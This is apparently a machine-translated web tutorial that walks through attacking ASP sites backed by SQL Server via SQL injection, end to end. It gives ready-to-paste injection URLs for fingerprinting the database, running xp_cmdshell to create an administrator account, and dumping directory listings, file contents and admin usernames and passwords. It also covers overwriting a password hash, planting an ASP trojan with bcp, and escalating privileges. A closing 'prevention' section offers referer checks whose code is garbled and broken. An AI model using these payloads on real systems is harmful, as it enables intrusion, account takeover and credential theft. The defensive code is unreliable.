The idea of SQL injection and the big advance of manual guessing

What do you call SQL injection?

Many web-site programs do not judge the legality of user input data when they are written, so that the application has a security risk. Users can submit a database query code, (usually in the browser address bar, through the normal WWW port access) According to the results returned by the program, to obtain some of the data he wanted to know, this is called SQL injection, that is, SQL injection.

The idea of SQL injection

Thinking is the most important. In fact, many people do not know what SQL can do? Here is a summary of the general idea of SQL injection intrusion:

1. The judgment of SQL Injection vulnerability, that is, to find the injection point

2. Determine the background database type

3. Determine xp_cmdshell performance; If the account with the current connection data has SA permission (which is the highest permission in the SQL System), and Master.dbo.xp_cmdshell the extended stored procedure (call this stored procedure to use the operating system shell directly) Can be executed correctly, the entire computer can be fully controlled by several methods and complete the injection process, otherwise continue:

1. Discovering the Web virtual directory

2. Upload ASP Trojan;

3. Get Administrator Privileges

Specific steps:

First, the SQL Injection vulnerability judgment

If you have not been injected before, please remove the IE menu-tool-internet Option-advanced-Display friendly HTTP error message before the tick.

In order to clarify the problem, the following HTTP://www.2cto.com/news.asp?id=xx (this address is hypothetical), as an example of analysis, XX may be an integral type, it may be a string.

1, the parameters of the whole type of judgment

When the input parameter xx is an integral type, the SQL statement in news.asp usually looks as follows:

SELECT * from table name where field =xx, so you can use the following steps to test whether SQL injection exists.

The simplest way to judge

HTTP://www.2cto.com/news.asp?id=xx ' (attaching a single quotation mark),

The SQL statement in news.asp now becomes

SELECT * from table name where Field =xx ',

If the program does not filter "'", it will prompt news.asp to run the exception, but such a method is very simple, but not the best, because:

First, not all IIS on each server will return specific error prompts to the client, if the program is added CInt (parameters) such as statements, SQL injection will not succeed, but the server will also error, the specific information for processing the URL when the server error. Please contact your system administrator.

Second, most programmers now have "'" filtered out, so with "'" Test not to inject point, so generally use the classic 1=1 and 1=2 test methods, see below:

HTTP://www.2cto.com/news.asp?id=xx and 1=1, news.asp run normally,

And the result is the same as the HTTP://www.2cto.com/news.asp?id=xx operation;

HTTP://www.2cto.com/news.asp?id=xx and 1=2, news.asp run exception (this is the classic 1=1 1=2 judging method)

If the above satisfies, there is a SQL injection vulnerability in news.asp, and conversely, it may not be injected.

2. The judgment of the string type parameter

The method is basically the same as the method of numerical parameter judgement.

When the input parameter xx is a string, typically the SQL statement in news.asp is as follows:

SELECT * from table name where field = ' xx ', so you can use the following steps to test whether SQL injection exists.

HTTP://www.2cto.com/news.asp?id=xx ' (append a single quotation mark), at which point the SQL statement in news.asp becomes
SELECT * from table name where Field =xx ', news.asp run exception;
HTTP://www.2cto.com/news.asp?id=xx and & #39; 1 ' = ' 1′, news.asp running normally,

And the result is the same as the HTTP://www.2cto.com/news.asp?id=xx operation;

HTTP://www.2cto.com/news.asp?id=xx and & #39; 1 ' = ' 2′, news.asp run exception;

If the above satisfies, there is a SQL injection vulnerability in news.asp, and conversely, it cannot inject

3. Handling of special cases

Sometimes an ASP programmer can filter out characters such as single quotes in a programmer to prevent SQL injection. Here are a few ways to try this.

①: Because VBS is not case-sensitive, programmers often filter either all uppercase strings or all lowercase strings, while mixed-case mixes tend to be overlooked. such as using Select instead of Select,select;

②unicode: In IIS, internationalization is done in the Unicode character set, and we can enter the strings entered in IE into Unicode strings. such as + =%2b, space =%20 and so on;

③ascii Code method: You can put some or all of the characters entered

4, in addition to the above methods, there is an easier way is to use off-the-shelf tools such as NBSI, AH D injection tool is a very good tool, the latest version of the current 2.2

Ii. Judging the type of database

There are differences in the functions and injection methods of different databases, so before we inject, we have to determine the type of database. The most commonly used database for ASP is access and SQL Server, which is one of more than 99% Web sites.

How do you get the program to tell you what database it uses? Take a look at:

SQL Server has some system variables that can be obtained directly from the error message if it is not turned off by the servers IIS prompt, and if it returns an error prompt, the method is as follows:
HTTP://www.2cto.com/news.asp?id=xx;and user>0

This sentence is simple, but contains the essence of SQL Server specific injection method, I myself also found in an unintentional test of this highly efficient method of guessing. Let me see what it means: first, the preceding statement is normal, with emphasis on and user>0, we know that user is a built-in variable for SQL Server whose value is the user name of the current connection, and the type is nvarchar. Take a nvarchar value compared with the number of int 0, the system will first try to convert the value of nvarchar to int, of course, the process will certainly be wrong, SQL Server error prompt is: The nvarchar value "ABC" Conversion data type int Syntax error occurred in the column, hehe, ABC is the value of the variable user, so that the Chuihuizhili will get the database user name. In a later space, you will see a lot of statements in this way. By the way, as we all know, SQL Server user SA is a role equivalent to adminstrators permissions, get SA permissions, almost certainly can get the host's administrator. The above method can be very convenient to test whether it is logged in with SA, note that: if it is the sa login, the hint is "dbo" to convert the column to an int error, not "sa".

If server IIS does not allow you to return an error message, how do you determine the database type? We can start with access and SQL Server, and both access and SQL Server have their own system tables, such as tables that hold all the objects in the database, access is in the system table [msysobjects], but reading the table in a Web environment prompts " No permissions ", SQL Server is in table [sysobjects] and can be read normally in a Web environment.

Use the following statement in case you confirm that you can inject:

HTTP://www.2cto.com/news.asp?id=xx; and (select COUNT (*) from sysobjects) >0
HTTP://www.2cto.com/news.asp?id=xx; and (select COUNT (*) from msysobjects) >0

If the database is SQL Server, then the first URL of the page and the original page HTTP://www.2cto.com/news.asp?id=xx is roughly the same, and the second URL, because the table msysobjects is not found, will prompt an error, Even if the program has fault-tolerant processing, the page is completely different from the original page.

If the database uses access, then the situation is different, the first URL of the page and the original page, the second URL, depending on whether the database settings are allowed to read the system table, generally not allowed, so the original URL is completely different. In most cases, the first URL will tell you the type of database used by the system, and the second URL should be used only as a validation when the IIS error prompt is turned on.

Iii. determination of the availability of xp_cmdshell

If the account currently connected to the data has SA permissions, and the Master.dbo.xp_cmdshell extended stored procedure (which calls the stored procedure can be directly used by the operating system shell) can be executed correctly, the entire computer can be fully controlled by the following methods, all future steps can be saved

1, HTTP://www.2cto.com/news.asp?id=xx and user>;0 news.asp execute exception but can get the user name of the current connection database (if the dbo is displayed for SA).

2, HTTP://www.2cto.com/news.asp?id=xx and db_name () >0 News.asp performs an exception but can get the database name of the current connection.

3. HTTP://www.2cto.com/news.asp?id=xx;exec Master. xp_cmdshell "NET user aaa Bbb/add" – (Master is the master data for Sql-server
A semicolon in a name indicates that Sql-server executes the statement name before the semicolon is executed, and the "-" sign is an annotation, indicating that all content behind it is only a comment, and the system does not execute) directly increases the operating system account AAA with a password of BBB.

4. HTTP://www.2cto.com/news.asp?id=xx;exec Master. xp_cmdshell "net localgroup Administrators Aaa/add" – just add
Account AAA added to the Administrators group.

5. HTTP://www.2cto.com/news.asp?id=xx;backuup database name to disk= ' C:\inetpub\wwwroot\save.db ' will get the data content
Back up to the Web directory, and download the file in HTTP (preferably the Web virtual directory, of course).

6. Create Unicode vulnerability by copying CMD

HTTP://www.2cto.com/news.asp?id=xx;exec Master.dbo.xp_cmdshell "Copy C:\winnt\system32\cmd.exe

C:\inetpub\scripts\cmd.exe "Creates a Unicode vulnerability that, through the exploitation of this vulnerability, completes the control of the entire computer (preferably the Web virtual directory, of course).

This will allow you to successfully complete a SQL injection attack! This time

Continue with the following steps when the above conditions are not true
(i), Discovery Web virtual directory

Only the Web virtual directory can be found to determine the location of the ASP Trojan, and then get user permissions. Two methods are more effective.

One is based on experience to guess, in general, Web virtual directory is: C:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot, and the executable virtual directory is:
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts and so on.

The second is to traverse the system directory structure, analyze the results and discover the Web virtual directory;

Create a temporary table first: Temp

HTTP://www.2cto.com/news.asp?id=xx;create table temp (id nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3
nvarchar (255)); –

Next:

1 We can use Xp_availablemedia to get all current drives and save them in the temp table:

HTTP://www.2cto.com/news.asp?id=xx;insert Temp EXEC master.dbo.xp_availablemedia;–

We can get a list of drives and related information by querying the contents of temp.

2 We can use Xp_subdirs to get a list of subdirectories and deposit them in the temp table:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID) EXEC master.dbo.xp_subdirs ' c: N '; –

3 We can also use Xp_dirtree to get the directory tree structure of all subdirectories and into the temp table:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID,NUM1) EXEC master.dbo.xp_dirtree ' c: N '; –

This will allow you to successfully browse to the list of all directories (folders):

If we need to view the contents of a file, we can do this by executing Xp_cmdsell:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID) Exec master.dbo.xp_cmdshell ' type c:\web\index.asp '; –

Use the ' BULK INSERT ' syntax to insert a text file into a temporary table. Example: BULK Insert temp (ID) from ' c:\inetpub\wwwroot\index.asp '
Browse temp to see the contents of the Index.asp file! Through the analysis of various ASP files, can get a lot of system information, Web construction and management information, even can get the SA account connection password.

Of course, if Xp_cmshell is able to execute, we can use it to complete:

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID) exec master.dbo.xp_cmdshell ' dir c:; –
HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID) exec master.dbo.xp_cmdshell ' dir c: *.asp/s/a '; –

Through xp_cmdshell we can see all we want to see, including W3SVC

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID) exec Master.dbo.xp_cmdshell ' cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum W3SVC '

However, if it is not SA permission, we can also use the

HTTP://www.2cto.com/news.asp?id=xx;insert into temp (ID,NUM1) EXEC master.dbo.xp_dirtree ' c: N '; –

Attention:

1. After each browsing, you should delete all content in temp, and delete the method:

HTTP://www.2cto.com/news.asp?id=xx;delete from temp;–

2. The method of browsing the temp table is: (assuming TestDB is the database name of the current connection)
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ID from TestDB.dbo.temp) >0

The value of the first record ID field in table temp is obtained and compared to an integer, obviously news.asp work exception, but the value of the ID field can be found in the exception. Assuming that the table name found is XYZ, the

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ID from TestDB.dbo.temp) >0 where ID is not in (' xyz ')) >0

Gets the value of the second Record ID field in table temp.

(b), upload ASP Trojan

The so-called ASP Trojan, is a special function of the ASP code, and put into the Web virtual directory under the scripts, remote customers through IE can execute it, and then get the user rights of the system, to achieve the initial control of the system. There are two more effective ways to upload ASP Trojan:

1, the use of web remote management functions

Many web sites, for the convenience of maintenance, provide remote management capabilities, there are many Web sites, the content is different users have different access rights. In order to achieve the control of user rights, there is a Web page, requiring user name and password, only entered the correct value, in order to proceed to the next step, you can achieve the management of the web, such as uploading, downloading files, directory browsing, modification configuration.

Therefore, to obtain the correct user name and password, not only can upload ASP trojan, and sometimes even can directly get user permission to browse the system, the previous step of the "Discovery Web virtual directory" of the complex operation can be omitted.

The user name and password are usually stored in a single table, and finding the table and reading the contents of it solves the problem. Two effective methods are given below.

A, injection method:

Theoretically, the Certification Web page will have the type such as:

SELECT * from admin where username= ' XXX ' and password= ' YYY ' statements, if the necessary character filtering is not performed before this sentence is formally run, SQL injection is easy to implement.

As in the User Name text box, enter: ABC ' or 1=1– in the Password box input: 123 The SQL statement becomes:

SELECT * from admin where username= ' abc ' or 1=1 and password= ' 123 '

Regardless of user input any user name and password, this statement will always be executed correctly, the user easily fooled the system, to obtain legal status.

B, guess the solution:

The basic idea is to guess the names of all the databases, guess each table name in the library, analyze the name of the table that holds the user name and password, guess each field name in the table, and guess the contents of each record in the table.

A guess all database names

HTTP://www.2cto.com/news.asp?id=xx and (select COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6) <> 0

Because the value of dbid is from 1 to 5, it is used by the system. So the user built it must have started from 6. And we submitted the name>1 (the Name field is a character type field and the number of errors will be error), news.asp work exception, you can get the first database name, the same dbid respectively changed to 7,8,9,10,11,12 ... All database names can be obtained.

The following assumptions give the database name TestDB.

b Guess the name of the user name table in the database

Guess solution: This method is based on individual experience to guess the name of the table, in general,

User,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
Systemusers,sysuser,sysusers,sysaccounts,systemaccounts and so on. and judge by the statement

HTTP://www.2cto.com/news.asp?id=xx and (select COUNT (*) from testdb.dbo. Table name) >0 If the table name exists, news.asp works fine, otherwise it is abnormal. So loop until you guess the name of the System Account table.

Read method: Sql-server has a table sysobjects that holds the core information of the system, all the tables, views, etc. of a library are all stored in this table, and this table can be accessed through the web.

When the xtype= ' U ' and status>0 represent a table created by the user, and the tables and names created by each user are found and analyzed, the name of the user name table can be obtained, and the basic implementation method is:

①http://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype= ' U ' and status>0) >0
Get the name of the first user to make the table, and compare it with an integer, obviously news.asp work exception, but in the exception you can find the name of the table. Assuming that the table name found is XYZ, the

②http://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype= ' U ' and status>0 and
Name not in (' xyz ')) >0 can get the name of the table created by the second user, and the same name can be obtained for all tables created using the.

According to the name of the table, it is generally possible to determine that the table user holds the user name and password, the following assumes that this table is named Admin.
C Guess the user Name field and Password fields name

Admin table must have a user name field, there must be a password fields, only to get the names of the two fields, it is possible to get the contents of the two fields. How to get their names, there are also the following two ways.

Guess solution: This method is based on individual experience to guess the field name, in general, the name of the user name fields commonly used: Username,name,user,account and so on. The name of the password field is commonly used: PASSWORD,PASS,PWD,PASSWD and so on. and judge by the statement

HTTP://www.2cto.com/news.asp?id=xx and (select count (field name) from TestDB.dbo.admin) >0 "SELECT count (field name) from table name"

The statement gets the number of rows in the table, so if the field name exists, then news.asp works fine, otherwise it is abnormal. So loop until you guess the names of the two fields.

Read method: The basic implementation method is

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 col_name (object_id (' admin '), 1) from TestDB.dbo.sysobjects) >0.
Select top 1 col_name (object_id (' admin '), 1) from TestDB.dbo.sysobjects is the first field name to get a known table name from sysobjects, and when compared to an integer, it is obvious that the news.asp is working abnormally, but the name of the field can be found in the exception. The Col_name (object_id (' admin '), 1) of 1 in turn replaced by 2,3,4,5,6 ... You can get all the field names.

D guess the user name and password

The most common and effective way to guess the contents of a user name and password is:

ASCII code verbatim decoding method: Although this method is slower, it is certainly feasible. The basic idea is to guess the length of the field first, then guess the value of each bit in turn. Guess the user name and the way to guess the password, the following to guess the user name as an example to illustrate its process.

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len (username) from TestDB.dbo.admin) =x (x=1,2,3,4,5, ... n,username

For the name of the user name field, admin is the name of the table), if x is a value I and news.asp is running normally, then I is the length of the first user name. such as: when the input
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len (username) from TestDB.dbo.admin) = 8 o'clock news.asp is working correctly, the first user name has a length of 8

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ASCII (substring (username,m,1)) from TestDB.dbo.admin) =n (the value of M in 1 to the previous step to get the user name length between, when m=1,2,3, ... Guesses separately,... The value of n is the ASCII value of 1~9, A~z, a~z, or any value between 1~128, and admin is the name of the System user Account table, and if n is a value I and news.asp is running normally, then I corresponds to the ASCII code is the user name a certain value. For example: When you enter
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ASCII (substring (username,3,1)) from TestDB.dbo.admin) = 80 o'clock news.asp is functioning normally, the third digit of the user name is P (ASCII for P); HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ASCII (substring (username,9,1)) from TestDB.dbo.admin) = 33 o'clock news.asp is working properly, then the 9th bit of the username is! (! ASCII is 80); Once you guess the first username and password, you can guess all the other usernames and passwords. Note: Sometimes the resulting password may be encrypted by MD5, etc., and it needs to be de-keyed with special tools. or change their password first, after use, and then change back, see the following instructions. Simple method: Guess user name with HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1), Flag is a field in the admin table, username is the user name segment, at which time news.asp works abnormally, but can get username value. With the same method, you can get a second user name, a third user, and so on until all the user names in the table.

Guess user password: HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1), flag is a field in the admin table, PW D is the password field, at which time news.asp works abnormally, but can get the value of PWD. With the same method, you can get the password for the second user name, the password for the third user, and so on, until the password for all the users in the table. Passwords are sometimes encrypted by MD5 and can be changed by password.

HTTP://www.2cto.com/news.asp?id=xx;update TestDB.dbo.admin set pwd= ' a0b923820dcc509a ' where username= ' www '; – ( The MD5 value of 1 is: Aaabbbcccdddeeef, that is, change the password to 1;www as the known user name) in the same way, of course, you can change the password to the original value.

2, using the table content to document the function

SQL has a bcp command that enables the contents of a table to be translated into a text file and placed in a specified location. With this feature, we can build a temporary table, and then enter an ASP Trojan in a row in the table, and then export the ASP file with the bcp command.

The command line format is as follows:

BCP "SELECT * from Text". Foo "queryout c:\inetpub\wwwroot\163.asp–c–s localhost–u sa–p foobar
(The ' S ' parameter is the server that executes the query, the ' U ' parameter is the username, the ' P ' parameter is the password, and the final upload is a 163.asp trojan)

3, using tools, such as NBSI given some reference data the most important table name:

SELECT * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
Systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

Some of the most important usernames (existing in the default SQL database)

Public
Dbo
Guest (generally forbidden, or not authorized)
Db_sercurityadmin
Ab_dlladmin
Some default extensions
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia Drive Related
Xp_dirtree Directory
XP_ENUMDSN ODBC connection
Xp_loginconfig Server security Mode information
Xp_makecab Creating a compressed volume
Xp_ntsec_enumdomains Domain Information
Xp_terminate_process terminal process, give a PID
(iii), access to system administrator rights

ASP trojan only user permissions, to obtain full control of the system, but also to have the system administrator rights. What to do? There are many ways to elevate permissions:

Upload Trojan, modify the boot automatically run. ini file (It restarts, it is dead);

Replicate CMD.exe to scripts and artificially create Unicode vulnerabilities;

Download the Sam file, hack and get all user name passwords for the OS;

And so on, depending on the specific situation of the system, different methods can be taken.

So how do we prevent injection? The program can be added to ASP or HTML or PHP or CGI as follows. have been tested. Join as beginning in top.asp file

Method one (as long as there is user injection then jump to: /.. /catalogue):

<%if session ("username" = "" or Session ("UserKey" = "Then
Response.Redirect ". /.. /”
End if%>

Method Two (as long as a user injection is judged as an external connection):

<%
Server_v1=cstr (Request.ServerVariables ("Http_referer")
Server_v2=cstr (Request.ServerVariables ("SERVER_NAME")
If Mid (Server_v1,8,len (SERVER_V2)) <> Server_v2 Then
Response.Write "

"Response.Write "

" Response.Write "You submitted the wrong path, prohibit the submission of data from outside the site please do not mess with this parameter! ” Response.Write "

"
Response.End
End If
%>

Method Three (as long as there is user injection then jump to: /catalogue):

<% Dim From_url,serv_url
From_url = Cstr (Request.ServerVariables ("Http_referer")
Serv_url = Cstr (Request.ServerVariables ("SERVER_NAME")
If Mid (From_url,8,len (serv_url)) <> Serv_url Then
Response.Write "NO"
Response.Redirect (".. /”
Response.End
End if%>

The idea of SQL injection and the big advance of manual guessing